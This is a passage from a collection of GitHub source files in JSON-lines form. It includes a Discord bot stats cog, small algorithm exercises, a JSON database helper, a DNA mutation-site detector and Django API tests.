asyncio.sleep(0)\n count += guild.member_count\n return count\n\n if not self.bot.is_ready():\n await self.bot.wait_until_ready()\n self.last = {\n \"users\": await user_count(),\n \"guilds\": len(self.bot.guilds)\n }\n\n # Update user count\n new_count = await user_count()\n if new_count != self.last[\"users\"]:\n pointer = Point(\"activity\").field(\"users\", new_count)\n await self.start_thread(pointer)\n self.last[\"users\"] = new_count\n\n @tasks.loop(seconds=10)\n async def update_stats(self):\n \"\"\" Updates the cpu usage and bot ping \"\"\"\n def get_cpu_percentage():\n \"\"\" Returns the bots cpu usage over the span of 3s \"\"\"\n return self.process.cpu_percent(interval=5)\n\n with suppress(Exception):\n result = await self.bot.loop.run_in_executor(\n None, get_cpu_percentage\n )\n cpu = round(result)\n ping = round(self.bot.latency * 1000)\n pointer = Point(\"stats\").field(\"cpu\", cpu).field(\"ping\", ping).field(\"messages\", self.messages)\n self.messages = 0\n await self.start_thread(pointer)\n\n @commands.Cog.listener(\"on_guild_join\")\n @commands.Cog.listener(\"on_guild_remove\")\n async def on_guild_count_change(self, _guild):\n if self.bot.is_ready():\n pointer = Point(\"activity\").field(\"guilds\", len(self.bot.guilds))\n await self.start_thread(pointer)\n self.last[\"guilds\"] = len(self.bot.guilds)\n\n @commands.Cog.listener()\n async def on_message(self, _message):\n self.messages += 1\n\n @commands.Cog.listener()\n async def on_command(self, ctx):\n await asyncio.sleep(1) # Let the command process first\n pointer = Point(\"commands\").field(ctx.command.name, 1)\n await self.start_thread(pointer)\n\n\ndef setup(bot):\n bot.add_cog(Influx(bot))\n","repo_name":"Villagers654-zz/Fate","sub_path":"cogs/core/influx.py","file_name":"influx.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"11993743375","text":"class SubsetGenerator:\r\n def __init__(self):\r\n self.arr = []\r\n\r\n def print_subsets(self):\r\n n = len(self.arr)\r\n num_subsets = 1 << n\r\n print(num_subsets)\r\n\r\n for i in range(num_subsets):\r\n subset = []\r\n for j in range(n):\r\n if (i >> j) & 1:\r\n subset.append(self.arr[j])\r\n print(subset)\r\n\r\n def take_input(self):\r\n n = int(input(\"Enter number of elements: \"))\r\n print(\"Enter elements:\")\r\n for i in range(n):\r\n temp = int(input())\r\n self.arr.append(temp)\r\n print(\"List of elements:\", self.arr)\r\n self.print_subsets()\r\n\r\n\r\ndef main():\r\n subset_generator = SubsetGenerator()\r\n subset_generator.take_input()\r\n\r\n\r\nmain()\r\n","repo_name":"kashyapkurmilla/CCE-AP-Lab","sub_path":"lab-5/q3.py","file_name":"q3.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"28090735657","text":"\"\"\"\nCSCI-603 Lab 9(Holi Cow)\nAuthor: Indrajeet Vidhate\nAuthor: Shubham Patil\n\"\"\"\n\nimport sys\nimport math\n\n\nclass CowNode:\n \"\"\"\n Node Class for the cows.\n \"\"\"\n __slots__ = 'name', 'X', 'Y', 'color', 'neighbors', 'colorsTriggered'\n\n def __init__(self, name, X, Y):\n self.name = name\n self.X = int(X)\n self.Y = int(Y)\n self.color = []\n self.neighbors = []\n self.colorsTriggered = {}\n\n def neighborList(self):\n \"\"\"\n Adjancency List for Cows\n :return:\n \"\"\"\n connectedTo = []\n for x in self.neighbors:\n connectedTo.append(x.name)\n return connectedTo\n\n def __str__(self):\n return self.name\n\n\nclass PaintballNode:\n \"\"\"\n Node Class for the Paint-balls\n \"\"\"\n __slots__ = 'name', 'X', 'Y', 'radius', 'neighbors', 'directNeighbors'\n\n def __init__(self, name, X, Y, radius):\n self.name = name\n self.X = int(X)\n self.Y = int(Y)\n self.radius = int(radius)\n self.neighbors = []\n self.directNeighbors = []\n\n def addNeighbor(self, neighbor):\n \"\"\"\n Adds given node to adjecency list of Paint-ball\n :param neighbor: Node to be added to Adjacency List\n :return:\n \"\"\"\n if isinstance(neighbor, CowNode):\n self.neighbors.append(neighbor)\n self.directNeighbors.append(neighbor)\n else:\n self.neighbors.append(neighbor)\n self.directNeighbors.append(neighbor)\n for x in neighbor.neighbors:\n if x not in self.neighbors:\n self.neighbors.append(x)\n\n def neighborList(self):\n \"\"\"\n Adjacency List of the Paint-ball\n :return:\n \"\"\"\n connectedTo = []\n for x in self.directNeighbors:\n connectedTo.append(x.name)\n return connectedTo\n\n def trigger(self, visited=None):\n \"\"\"\n Triggers the paintball and paints cows within it's range and\n triggers other paintballs within it's range.\n :param visited:\n :return:\n \"\"\"\n count = 0\n if visited is None:\n visited = []\n visited.append(self)\n\n for x in self.directNeighbors:\n if x not in visited:\n if isinstance(x, CowNode):\n print(\"\\t\", x.name, \"is painted\", self.name)\n count += 1\n if isinstance(x, PaintballNode):\n print(\"\\t\", x.name, \"Paintball is triggered by\", self.name, \"Paintball!\")\n count += x.trigger(visited)\n return count\n\n def winner_result(self, visited=None):\n \"\"\"\n To identify chain reaction caused by best choice paint-ball.\n :param visited:\n :return:\n \"\"\"\n if visited is None:\n visited = []\n visited.append(self)\n\n for x in self.directNeighbors:\n if x not in visited:\n if isinstance(x, CowNode):\n x.color.append(self.name)\n if isinstance(x, PaintballNode):\n x.winner_result(visited)\n\n def __str__(self):\n return self.name\n\n\nclass Graph:\n \"\"\"\n Class to generate Graph for CowNodes and PaintballNodes\n \"\"\"\n __slots__ = 'fieldInfo', 'colorCount'\n\n def __init__(self):\n self.fieldInfo = {}\n self.colorCount = {}\n\n def in_range(self, Obj1, Obj2):\n \"\"\"\n tells whether two nodes are within range of each other.\n :param Obj1: Must be PaintballNode\n :param Obj2: Can be CowNode or PaintballNode\n :return: true if given Obj2 is within reach of Obj1\n \"\"\"\n x1 = Obj1.X\n y1 = Obj1.Y\n x2 = Obj2.X\n y2 = Obj2.Y\n distance = math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2)\n return distance <= Obj1.radius\n\n def addCowNode(self, name, X, Y):\n \"\"\"\n Adds the CowNode to the Graph and Adjacency List of Paintballs\n for which they are in range.\n :param name: Name of the Cow\n :param X: x co-ordinate of CowNode\n :param Y: y co-ordinate of CowNode\n :return:\n \"\"\"\n self.fieldInfo[name] = CowNode(name, X, Y)\n for x in self.fieldInfo:\n if not x == name and isinstance(self.fieldInfo[x], PaintballNode):\n if self.in_range(self.fieldInfo[x], self.fieldInfo[name]):\n self.fieldInfo[x].addNeighbor(self.fieldInfo[name])\n\n def addPaintballNode(self, name, X, Y, radius):\n \"\"\"\n Adds the PaintballNode to the Graph and Adjacency List of Paintballs\n for which they are in range.\n :param name: Color of Paintball\n :param X: x co-ordinate of PaintballNode\n :param Y: y co-ordinate of PaintballNode\n :param radius: radius of PaintballNode\n :return:\n \"\"\"\n self.fieldInfo[name] = PaintballNode(name, X, Y, radius)\n for x in self.fieldInfo:\n if not x == name:\n if isinstance(self.fieldInfo[x], CowNode):\n if self.in_range(self.fieldInfo[name], self.fieldInfo[x]):\n self.fieldInfo[name].addNeighbor(self.fieldInfo[x])\n else:\n if self.in_range(self.fieldInfo[name], self.fieldInfo[x]):\n self.fieldInfo[name].addNeighbor(self.fieldInfo[x])\n elif self.in_range(self.fieldInfo[x], self.fieldInfo[name]):\n self.fieldInfo[x].addNeighbor(self.fieldInfo[name])\n\n def simulate(self):\n \"\"\"\n Triggers all the paintballs in the Field(Graph)\n :return:\n \"\"\"\n for x in self.fieldInfo:\n if isinstance(self.fieldInfo[x], PaintballNode):\n print(\"Triggering\", x, \"Paintball\")\n self.colorCount[x] = self.fieldInfo[x].trigger()\n\n def displayColor(self):\n \"\"\"\n Displays the Colors painted on Cows after triggering Paint-ball\n :return:\n \"\"\"\n for x in self.fieldInfo:\n if isinstance(self.fieldInfo[x], CowNode):\n print(x + \"'s color's:\", self.fieldInfo[x].color)\n\n def result(self):\n \"\"\"\n Displays the best choice paint-ball along with number of\n colors painted cows due to triggering of that paintball.\n :return: max : number of cows painted due to triggering,\n color: The best choice Paintball\n \"\"\"\n max = 0\n for x in self.colorCount:\n if self.colorCount[x] > max:\n max = self.colorCount[x]\n color = x\n if not max == 0:\n self.fieldInfo[color].winner_result()\n return max, color\n else:\n return 0, 0\n\n\ndef main():\n \"\"\"\n Reads the Field(Graph) input from file and generates the\n Graph and simulates triggering of paint-balls.\n :return:\n \"\"\"\n if len(sys.argv) == 2:\n file_name = sys.argv[1]\n else:\n print(\"Usage: holicow.py \")\n field = Graph()\n with open(file_name) as f:\n for line in f:\n line.strip()\n entry = line.split()\n if entry[0] == 'cow':\n field.addCowNode(entry[1], entry[2], entry[3])\n\n if entry[0] == 'paintball':\n field.addPaintballNode(entry[1], entry[2], entry[3], entry[4])\n\n print(\"Field of Dreams\")\n print(\"---------------\")\n for nodes in field.fieldInfo:\n print(nodes, \" connected to \", field.fieldInfo[nodes].neighborList())\n\n print(\"Beginning Simulation...\")\n field.simulate()\n\n print(\"Results:\")\n max, color = field.result()\n if max > 0:\n print(\"Triggering the\", color, \"paint-ball is the best choice with\", max, \"total paint on cows.\")\n field.displayColor()\n else:\n print(\"No cows were printed were painted by any starting paint-ball!\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ShubhamPatil7-zz/Data-Structure-and-Algorithms","sub_path":"holicow.py","file_name":"holicow.py","file_ext":"py","file_size_in_byte":7981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"26692651200","text":"import json\r\n\r\nmax_id = None\r\n\r\n\r\nclass Database(object):\r\n def __init__(self):\r\n self.json_file_path = \"db.json\"\r\n self.data = self.load_data()\r\n\r\n def load_data(self):\r\n global max_id\r\n\r\n try:\r\n with open(self.json_file_path, 'r') as file:\r\n res = []\r\n data = json.load(file)\r\n for d in data:\r\n res.append(json.loads(d) if isinstance(d, str) else d)\r\n\r\n max_id = 0 if len(res) == 0 else max(res, key=lambda x: x['id'])['id']\r\n\r\n return res\r\n except FileNotFoundError:\r\n # If the file doesn't exist, create an empty data structure\r\n max_id = 0\r\n return []\r\n\r\n def save_data(self):\r\n with open(self.json_file_path, 'w') as file:\r\n res = []\r\n for d in self.data:\r\n if hasattr(d, 'json') and callable(d.json):\r\n res.append(d.json())\r\n else:\r\n res.append(d)\r\n\r\n json.dump(res, file, indent=2)\r\n\r\n def insert_data(self, record):\r\n self.data.append(record)\r\n self.save_data()\r\n\r\n def get_all_data(self):\r\n return self.data\r\n\r\n def delete_data(self, record_id):\r\n removed = None\r\n new_data = []\r\n\r\n for record in self.data:\r\n if record.get('id') != record_id:\r\n new_data.append(record)\r\n else:\r\n removed = record\r\n\r\n self.data = new_data\r\n self.save_data()\r\n return removed\r\n\r\n def update_data(self, record_id, new_values):\r\n for record in self.data:\r\n if record.get('id') == record_id:\r\n record.update(new_values)\r\n self.save_data()\r\n\r\n def search_by_criteria(self, search_criteria):\r\n if 'id' in search_criteria:\r\n record_id = search_criteria['id']\r\n return [record for record in self.data if record.get('id') == record_id]\r\n else:\r\n return [record for record in self.data if all(record[key] == value for key, value in search_criteria.items())]\r\n\r\n def get_record_by_id(self, record_id):\r\n results = self.search_data({'id': record_id})\r\n return results[0] if results else None\r\n\r\n def group_by(self, key):\r\n grouped_data = {}\r\n for record in self.data:\r\n value = record.get(key)\r\n if value not in grouped_data:\r\n grouped_data[value] = []\r\n grouped_data[value].append(record)\r\n return grouped_data\r\n\r\n def sort_by(self, key, reverse=False):\r\n self.data.sort(key=lambda x: x.get(key), reverse=reverse)\r\n return self.data\r\n\r\n","repo_name":"axshani/py_server","sub_path":"services/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"964277943","text":"from Bio.SeqIO import parse\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport numpy as np\nimport re\nfrom pandas import DataFrame, concat\nfrom textwrap import wrap\nimport os\nimport glob\nfrom pathlib import Path\nimport gzip\nfrom os.path import join\n\n\n\n\n\n### calculate part of sequence based on start and end indexes\ndef genome_cutter(start, end, seq):\n return seq[start:end]\n\n\n\ndef find_recombination_sites(example_seq, num_sites):\n\n ### count all sequences of length 16\n vectorizer = CountVectorizer(analyzer= 'char_wb', ngram_range=(16, 16))\n counter = vectorizer.fit_transform([example_seq]).toarray()\n\n ### find those that appear more than once\n sites_recombination = list(np.where(counter > 1)[1])\n\n if len(sites_recombination)==0:\n return DataFrame(columns = ['start', 'end'])\n\n ### get all sequences\n all_sites = vectorizer.get_feature_names()\n\n\n suspect_recombination = []\n\n for site in sites_recombination:\n ### get current site\n curr_seq = all_sites[site]\n ### get list of locations that are a match to the site\n list_regions = list(re.finditer(curr_seq.upper(), example_seq))\n ### extract coordinates from Match object\n list_regions = [x.span() for x in list_regions]\n\n suspect_recombination.extend(list_regions)\n\n ### this is now a list of tuples, containing coordinates of suspect recombination sites\n suspect_recombination = sorted(suspect_recombination)\n\n ### turn the tuples into a dataframe of start and end coordinates of the sites\n df_recombination = DataFrame(suspect_recombination, columns = ['start', 'end'])\n\n ### when we have matches larger than 16, they will turn into subsequent matches of 16. The following script is meant\n ### to join them together back to one larger region\n\n ### find the difference between current start and previous start, and between next end to current end. For ranges in\n ### the middle of a larger region, these will be 1 and 1. For our larger region, we only need the edges, so we get rid\n ### of the rest.\n df_recombination.loc[:, 'start_delta'] = df_recombination['start'] -df_recombination['start'].shift()\n df_recombination.loc[:, 'end_delta'] = df_recombination['end'].shift(-1)- df_recombination['end']\n df_recombination = df_recombination[(df_recombination.start_delta!=1.0)|(df_recombination.end_delta!=1.0)]\n\n ### starts of region will have end_delta==1, while ends of region will have start_delta = 1. We'll want to backpropagate\n ### the true end coordinate to the true start coordinate. So, we delete the end values in region starts, and backfill the end coordinates\n ### afterwards, we will keep only the region starts, which now have both coordinates correct\n df_recombination.loc[(df_recombination.end_delta == 1.0), 'end'] = None\n df_recombination.loc[:, 'end'] = df_recombination.loc[:, 'end'].fillna(method='bfill').astype(int)-1\n df_recombination = df_recombination[df_recombination.start_delta!=1.0][['start', 'end']]\n\n ### attach the segment of the genetic sequence marked by these coordinates\n df_recombination.loc[:, 'sequence'] = df_recombination.apply(lambda x: genome_cutter(x['start'], x['end'], example_seq), axis=1)\n\n ### merge same sequences, so can easily see where the duplicates are\n df_recombination = df_recombination.merge(df_recombination, on = 'sequence', suffixes = ('_1', '_2'))\n ### keep them as ordered matches - also gets rid of duplicates\n df_recombination = df_recombination[df_recombination.end_11, all sites where\n ### a sequence of length L repeats 3 times or more.\n\n slippage_sites = []\n\n ### this process needs to repeated for all frameshifts up to L, because the repeating sequence can start in any frameshift.\n for frameshift in range(L):\n ### frame shift the whole sequence for ease of calculation\n curr_seq = sequence[frameshift:]\n ### split sequence into equal parts of length L (shortening the last part as needed).\n curr_seq_split = wrap(curr_seq, L)\n\n ### until what small sequence d owe need to check\n end_of_range = len(curr_seq_split)-2\n if L==1:\n end_of_range-=1\n for ii in range(end_of_range):\n\n ### in case of L>1, this expression is true when current sequence is equal to the next two. this is to mark\n ### the site that is prone to polymerase slippage\n is_followed2 = ((curr_seq_split[ii]==curr_seq_split[ii+1]) and (curr_seq_split[ii]==curr_seq_split[ii+2]) and L>1)\n ### relevant expression for L=1\n is_followed1 = ((curr_seq_split[ii]==curr_seq_split[ii+1]) and (curr_seq_split[ii]==curr_seq_split[ii+2]) and\n (curr_seq_split[ii]==curr_seq_split[ii+3]) and L==1)\n\n ### save index of start and end of region, for L>1 and L = 1\n if is_followed2:\n curr_start = frameshift+ii*L\n curr_end = frameshift+L*(ii+3)\n slippage_sites.append((curr_start, curr_end))\n\n if is_followed1:\n curr_start = ii\n curr_end = ii+4\n slippage_sites.append((curr_start, curr_end))\n\n ### if no regions found, return empty dataframe\n if len(slippage_sites)==0:\n return DataFrame(columns = ['start', 'end', 'sequence', 'length_base_unit'])\n\n\n df_slippage = DataFrame(sorted(slippage_sites), columns = ['start', 'end'])\n\n ### once again, we have larger suspect regions represented as a sequence of small suspect regions. As before, we find\n ### the delta to nearby start and end indices. We get rid of middle regions, and from the edges find once again the\n ### site's coordinates\n\n df_slippage.loc[:, 'start_delta'] = df_slippage['start'] - df_slippage['start'].shift()\n df_slippage.loc[:, 'end_delta'] = df_slippage['end'].shift(-1) - df_slippage['end']\n df_slippage = df_slippage[(df_slippage.start_delta != 1.0) | (df_slippage.end_delta != 1.0)]\n df_slippage.loc[(df_slippage.end_delta == 1.0), 'end'] = None\n df_slippage.loc[:, 'end'] = df_slippage.loc[:, 'end'].fillna(method='bfill').astype(int)\n df_slippage = df_slippage[df_slippage.start_delta != 1.0][['start', 'end']]\n\n ### add sequence found, and length of base unit\n df_slippage.loc[:, 'sequence'] = df_slippage.apply(lambda x: genome_cutter(x['start'], x['end'], sequence), axis=1)\n df_slippage.loc[:, 'length_base_unit'] = L\n\n\n return df_slippage\n\n\n\ndef find_slippage_sites(seq, num_sites):\n\n ### create df of slippage sites for all base unit lengths up to 15\n slippage_sites_list = []\n for ii in range(1, 16):\n slippage_sites_list.append(find_slippage_sites_length_L(seq, ii))\n df_slippage = concat(slippage_sites_list, ignore_index=True)[['start', 'end', 'length_base_unit', 'sequence']]\n\n ### find nmber of repeats per site, and calculate mutation rate from empirical formula\n df_slippage.loc[:, 'num_base_units'] = df_slippage.sequence.apply(lambda x: len(x))/df_slippage.length_base_unit\n\n df_slippage.loc[:, 'log10_prob_slippage_ecoli'] = -4.749+0.063*df_slippage['num_base_units']\n df_slippage.loc[df_slippage.length_base_unit==1, 'log10_prob_slippage_ecoli'] = -12.9+0.729*df_slippage['num_base_units']\n\n ### return slippage sites, sorted by risk and limited in number of sites\n df_slippage= df_slippage.sort_values(['log10_prob_slippage_ecoli', 'length_base_unit'], ascending=[False, False])\n\n if type(num_sites) == int:\n df_slippage = df_slippage.head(num_sites)\n\n\n return df_slippage\n\n\n\ndef motif_prob_extractor(methylation_sites_path):\n ### open text file for extraction\n with open(methylation_sites_path, \"r\") as handle:\n motif_raw_data = handle.read()\n\n ### split text by motif\n motif_data_split = motif_raw_data.split('MOTIF')[1:]\n\n ### initiate dictionary which will keep motif probabilities\n motif_probs = {}\n\n for row in motif_data_split:\n ### get motif name from first row\n motif_name = row.split(\"\\n\")[0].split('_')[-1]\n ### get number of nucleotides in motif\n num_nucleotides = int(row.split(\"w= \")[1].split(' ')[0])\n ### get table of probabilities\n table_probs = [x for x in row.split(\"\\n\")[2:] if x!= '']\n\n ### extract num of nucleotides and probability of nucleotide per index\n motif_probs_curr = {x:{} for x in range(num_nucleotides)}\n motif_probs_curr['num_nucleotides'] = num_nucleotides\n\n for ii, prob_row in enumerate(table_probs):\n row_table_split = [float(x) for x in prob_row.split('\\t')]\n motif_probs_curr[ii]['A'] = row_table_split[0]\n motif_probs_curr[ii]['C'] = row_table_split[1]\n motif_probs_curr[ii]['G'] = row_table_split[2]\n motif_probs_curr[ii]['T'] = row_table_split[3]\n\n motif_probs[motif_name] = motif_probs_curr\n\n ### define and sort a summarizing dataframe for later merge\n df_site_probs = DataFrame.from_dict(motif_probs).T.reset_index().rename(columns = {'index':'matching_motif'})\n cols = sorted([x for x in list(df_site_probs) if type(x)==int])\n df_site_probs = df_site_probs[['matching_motif', 'num_nucleotides']+cols]\n\n return motif_probs, df_site_probs\n\n\n\n\ndef site_motif_grader(start_index, motif, example_seq):\n ### find a similarity measure between the sequence starting in current index, and current motif\n\n conjugate_dict = {'A': 'T', 'T': 'A', 'G': 'C', 'C': 'G'}\n\n num_nucleotides = motif['num_nucleotides']\n\n ### calculate the current sequence, and the reverse cojugate ending in current index\n curr_seq = example_seq[start_index:(start_index+num_nucleotides)]\n curr_seq_conjugate = ''.join([conjugate_dict[x] for x in curr_seq[::-1]])\n\n ### if we're already in the end, return probability 0.\n if len(curr_seq)log10_site_match:\n log10_site_match = curr_prob_log10\n matching_motif = site_name\n end_index = start_index+num_nucleotides-1\n actual_site = example_seq[start_index:(end_index+1)]\n actual_site_rev_conj = ''.join([conjugate_dict[x] for x in actual_site[::-1]])\n\n return (actual_site, actual_site_rev_conj, matching_motif, start_index, end_index, log10_site_match)\n\n\n\ndef site_ranker(example_seq, num_sites, motif_probs):\n\n ### per start index, extract best matching site and score, arrange in dataframe, sort and keep highest scores\n\n site_ranking_list = []\n\n for ii in range(len(example_seq)):\n site_ranking_curr = calc_max_site(ii, example_seq, motif_probs)\n site_ranking_list.append(site_ranking_curr)\n\n df_methylation = DataFrame(site_ranking_list, columns=['actual_site', 'actual_site_rev_conj', 'matching_motif', 'start_index', 'end_index', 'log10_site_match'])\n\n df_methylation = df_methylation.sort_values('log10_site_match', ascending=False)\n\n if type(num_sites) == int:\n df_methylation = df_methylation.head(num_sites)\n\n return df_methylation\n\n\n\n\n\n\ndef suspect_site_extractor(example_seq, compute_methylation, num_sites, methylation_sites_path, extension = ''):\n\n\n sites_collector = {}\n df_recombination = find_recombination_sites(example_seq, num_sites)\n\n df_slippage = find_slippage_sites(example_seq, num_sites)\n\n sites_collector['df_recombination'+extension] = df_recombination\n sites_collector['df_slippage'+extension] = df_slippage\n\n\n ### do methylation only if requested\n if compute_methylation == True:\n motif_probs, df_site_probs = motif_prob_extractor(methylation_sites_path)\n\n df_methylation = site_ranker(example_seq, num_sites, motif_probs)\n df_methylation = df_methylation.merge(df_site_probs, on='matching_motif', how='left')\n sites_collector['df_methylation' + extension] = df_methylation\n\n return sites_collector\n\n\n\n#############################################################################################################\n### feature generation\n\n\n# def data_analyzer(df_slippage, df_recombination, df_methylation):\n#\n#\n#\n# return df_features\n#\n#\n\ndef data_handler(data, file, output_path, compute_methylation, num_sites, methylation_sites_path, input_folder):\n\n if type(data) == list:\n\n recombination_collector = []\n slippage_collector = []\n methylation_collector = []\n\n for ii, record in enumerate(data[:30]):\n example_seq = str(record.seq)\n\n curr_sites_collector = suspect_site_extractor(example_seq, compute_methylation, num_sites, methylation_sites_path, extension = '_'+str(ii))\n\n df_recombination = curr_sites_collector['df_recombination_'+str(ii)]\n if len(df_recombination) >0:\n df_recombination.loc[:, 'sequence_number'] = str(ii)\n recombination_collector.append(df_recombination)\n\n df_slippage = curr_sites_collector['df_slippage_' + str(ii)]\n if len(df_slippage) >0:\n df_slippage.loc[:, 'sequence_number'] = str(ii)\n slippage_collector.append(df_slippage)\n\n if compute_methylation == True:\n df_methylation = curr_sites_collector['df_methylation_' + str(ii)]\n if len(df_methylation) > 0:\n df_methylation.loc[:, 'sequence_number'] = str(ii)\n methylation_collector.append(df_methylation)\n\n new_path = file.split(input_folder)[1].split('.fasta')[0]\n\n curr_output_path = output_path+new_path\n\n Path(curr_output_path).mkdir(parents=True, exist_ok=True)\n\n df_recombination = concat(recombination_collector)\n df_slippage = concat(slippage_collector)\n\n\n df_recombination.to_csv(join(curr_output_path, r'recombination_sites.csv'))\n df_slippage.to_csv(join(curr_output_path, r'slippage_sites.csv'))\n\n\n if compute_methylation == True:\n df_methylation = concat(methylation_collector)\n df_methylation.to_csv(join(curr_output_path, r'methylation_sites.csv'))\n\n else:\n example_seq = str(data.seq)\n\n sites_collector = suspect_site_extractor(example_seq, compute_methylation, num_sites, methylation_sites_path)\n\n ### save to output\n new_path = file.split('.fasta')[0]\n\n curr_output_path = join(output_path, new_path)\n\n Path(curr_output_path).mkdir(parents=True, exist_ok=True)\n\n sites_collector['df_recombination'].to_csv(join(curr_output_path, r'recombination_sites.csv'))\n sites_collector['df_slippage'].to_csv(join(curr_output_path, r'slippage_sites.csv'))\n\n\n if compute_methylation == True:\n sites_collector['df_methylation'].to_csv(join(curr_output_path, r'methylation_sites.csv'))\n\n return\n\n\n\n\ndef main(input_folder = os.getcwd(), output_path = join(os.getcwd(), 'output'), compute_methylation = False, num_sites = None,\n methylation_sites_path = join(os.getcwd(), r'topEnriched.313.meme.txt'), test = False):\n\n\n \"\"\"\n The function gets as input a directory. This directory and all subdirectories are copied into the output folder. Each fasta and fasta.gz\n file gets replaced by a directory of the same name, and populated by csv files, detailing recombination sites, slippage sites,\n and possibly methylation sites.\n\n\n Args:\n\n input_folder(str): path from which to read fasta and fasta.gz files. Default value is current path.\n\n output_path(str): directory into which to write csv's detailing suspect sites. Default value is 'output' within path of script.\n\n compute_methylation(bool): whether to calculate methylation sites. Relevant only for mammalian and insectoid cells.\n Default value is False.\n\n num_sites(Union[int, None]): How many values to keep per output file. If None, keep all. Default is None.\n\n methylation_sites_path(str): path of methylation sites file, which is an input to the methylation probability calculation.\n Default value is 'topEnriched.313.meme.txt' within script path.\n\n test(bool): whether this is a test run and you only need a couple of files for testing purposes. Default value: False.\n\n\n Returns:\n No variable. Saves output csv's in output_path.\n \"\"\"\n\n\n files_1 = glob.glob(join(input_folder, '*', '*.fasta*'), recursive = True)\n files = glob.glob(join(input_folder, '*.fasta*'), recursive = True)\n\n if test == True:\n files_1 = files_1[0:1]\n files = files[0:1]\n\n files.extend(files_1)\n\n for file in files:\n with open(file, \"rU\") as handle:\n data = list(parse(handle, \"fasta\"))\n\n data_handler(data, file, output_path, compute_methylation, num_sites, methylation_sites_path, input_folder)\n\n for file in glob.glob(join(input_folder, '*', '*.fasta.gz'), recursive = True):\n with gzip.open(file, \"rt\") as handle:\n data = list(parse(handle, \"fasta\"))\n\n data_handler(data, file, output_path, compute_methylation, num_sites, methylation_sites_path, input_folder)\n\n return\n\n\n# input_folder = join(os.getcwd(), 'fasta_draft_200703')\n# output_path = join(os.getcwd(), 'new_output', 'output')\n# compute_methylation = True\n# num_sites = 100\n# methylation_sites_path = join(os.getcwd(), r'topEnriched.313.meme.txt')\n# test = True\n#\n# main(input_folder = input_folder, output_path = output_path, compute_methylation = compute_methylation, num_sites = num_sites,\n# methylation_sites_path = methylation_sites_path, test = test)\n#\n#\n","repo_name":"AmitayNiv/iGEM","sub_path":"EFM/EFM_detector_generalized.py","file_name":"EFM_detector_generalized.py","file_ext":"py","file_size_in_byte":21016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73381914456","text":"from django.test import TestCase\nfrom unittest.mock import patch\nfrom django.utils import timezone\n\nfrom tournament_api.settings import TIME_ZONE\nfrom eliminationtournaments.singletons import BGScheduler\n\nclass SingletonTest(TestCase):\n\n def setUp(self) -> None:\n pass\n\n def test_singleton_instance(self):\n instance1 = BGScheduler.get_instance()\n instance2 = BGScheduler.get_instance()\n self.assertIs(instance1, instance2, \"Instances should be the same\")\n\n def test_print_data(self):\n instance = BGScheduler.get_instance()\n with patch('builtins.print') as mock_print:\n instance.print_data()\n mock_print.assert_called_with(instance)\n\n def test_existing_bg_jobs(self):\n bg = BGScheduler.get_instance()\n now = timezone.now().timestamp()\n\n end_date = timezone.datetime.fromtimestamp(now + 10)\n\n bg.sched.add_job(lambda : print('Call me maybe'), 'date', run_date=end_date, timezone=TIME_ZONE)\n self.assertTrue(len(bg.sched.get_jobs()) >= 1)\n","repo_name":"marcelobbfonseca/api-elimination-tournament-django","sub_path":"eliminationtournaments/tests/singletons.py","file_name":"singletons.py","file_ext":"py","file_size_in_byte":1047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"73242560536","text":"from io import BytesIO\n\nimport pytest\nfrom PIL import Image\nfrom django.core.files import File\nfrom django.core.files.uploadedfile import SimpleUploadedFile\nfrom mock import MagicMock\nfrom model_bakery import baker\nfrom rest_framework import status\n\nfrom djangoProject.utils import create_picture\nfrom word.models import Category\n\n\n@pytest.fixture\ndef get_category(api_client):\n def do_get_category(id=None):\n if id:\n return api_client.get(f'/kalameh/category/{id}/')\n return api_client.get('/kalameh/category/')\n\n return do_get_category\n\n\n@pytest.fixture\ndef get_category_id(api_client):\n def do_category_word(id):\n return api_client.get(f'/kalameh/category/{id}/')\n\n return do_category_word\n\n\nmock_image = MagicMock(spec=File)\nmock_image.name = \"test.png\"\nmock_video = MagicMock(spec=File)\nmock_video.name = \"test.mp4\"\npost_data = {\n 'title': 'a',\n 'slug': 'a',\n 'pronunciation': 'a',\n 'video': mock_video,\n 'picture': mock_image,\n}\n\n\n@pytest.fixture\ndef create_category(api_client):\n def do_create_category(data):\n return api_client.post('/kalameh/category/', data)\n\n return do_create_category\n\n\n@pytest.fixture\ndef update_category(api_client):\n def do_update(data, id):\n return api_client.patch(f'/kalameh/category/{id}/', data)\n\n return do_update\n\n\n@pytest.fixture\ndef delete_category(api_client):\n def do_delete(id):\n return api_client.delete(f'/kalameh/category/{id}/')\n\n return do_delete\n\n\n@pytest.mark.django_db\nclass TestGetCategory:\n def test_if_anonymous_get_category_return_401(self, get_category):\n response = get_category()\n\n assert response.status_code == status.HTTP_401_UNAUTHORIZED\n\n def test_if_authenticated_get_category_return_200(self, get_category, api_client, authenticate):\n authenticate(is_staff=False)\n\n response = get_category()\n\n assert response.status_code == status.HTTP_200_OK\n\n def test_if_anonymous_retrieve_category_return_401(self, get_category_id):\n category_obj = baker.make(Category)\n\n response = get_category_id(category_obj.id)\n\n assert response.status_code == status.HTTP_401_UNAUTHORIZED\n\n def test_if_user_is_authenticaed_retrive_category_return_200(self, get_category_id, api_client, authenticate):\n authenticate(is_staff=False)\n category_obj = baker.make(Category)\n\n response = get_category_id(category_obj.id)\n print(response.data)\n\n assert response.status_code == status.HTTP_200_OK\n\n def test_if_user_is_authenticaed_get_word_return_404(self, get_category_id, api_client, authenticate):\n authenticate(is_staff=False)\n\n response = get_category_id(2534562)\n\n assert response.status_code == status.HTTP_404_NOT_FOUND\n\n\n@pytest.mark.django_db\nclass TestCreateCategory:\n def test_if_user_is_anonymous_return_401(self, create_category):\n response = create_category({})\n\n assert response.status_code == 